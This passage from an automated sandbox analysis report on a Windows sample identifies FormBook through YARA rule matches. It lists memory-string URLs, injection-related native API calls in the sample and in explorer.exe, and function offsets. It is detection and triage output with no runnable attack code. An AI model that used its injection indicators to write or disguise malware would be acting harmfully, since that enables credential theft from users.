          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.esvstudybible.org/search?q=
          Source: 0O9BJfVJi6fEMoS.exeString found in binary or memory: http://www.esvstudybible.org/search?q=Whttp://www.blueletterbible.org/Bible.cfm?b=
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.694922945.0000000006D62000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.715777408.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=com
          Source: explorer.exe, 0000000B.00000002.915089078.00000000056C2000.00000004.00000001.sdmpString found in binary or memory: https://www.hugedomains.com/domain_profile.cfm?d=grandwhale&e=com

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004181AC NtCreateFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00418262 NtReadFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004182DA NtClose,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016798F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016795D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016797A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016799D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016798A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A10 NtQuerySection,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679560 NtWriteFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016795F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679760 NtOpenProcess,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A770 NtOpenThread,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0167A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01679610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016796D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079560 NtWriteFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0507A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05079A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009881B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009882E0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988260 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009881AC NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_009882DA NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00988262 NtReadFile,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_0103D20C
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_0103F2C0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_0103F2D0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00401029
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00401030
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00408C4B
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00408C50
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B536
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00402D90
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041C5B7
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B7D2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00402FB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163F900
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F1002
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017028EC
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017020A8
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B090
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01702B28
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FDBD2
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166EBB0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017022AE
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01701D55
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01630D20
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01702D07
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164D5E0
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_017025DD
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662581
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FD466
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164841F
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01701FF1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01656E30
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016FD616
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01702EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0503F900
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05102D07
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05030D20
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05054120
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101D55
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05062581
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051025DD
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504D5E0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050F1002
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504841F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0504B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050620A0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051020A8
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051028EC
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05102B28
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0506EBB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_050FDBD2
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05101FF1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05056E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_051022AE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_05102EF7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00978C50
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00978C4B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00972D90
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098C5B7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B536
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00972FB0
          Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 0503B150 appears 35 times
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: String function: 0163B150 appears 35 times
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.686761788.00000000006E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.695770371.0000000008A00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000005.00000000.684507893.0000000000312000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.730975183.0000000000AA2000.00000002.00020000.sdmpBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732802577.000000000172F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exe, 00000006.00000003.730245049.00000000039AE000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeBinary or memory string: OriginalFilename5uogbG vs 0O9BJfVJi6fEMoS.exe
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
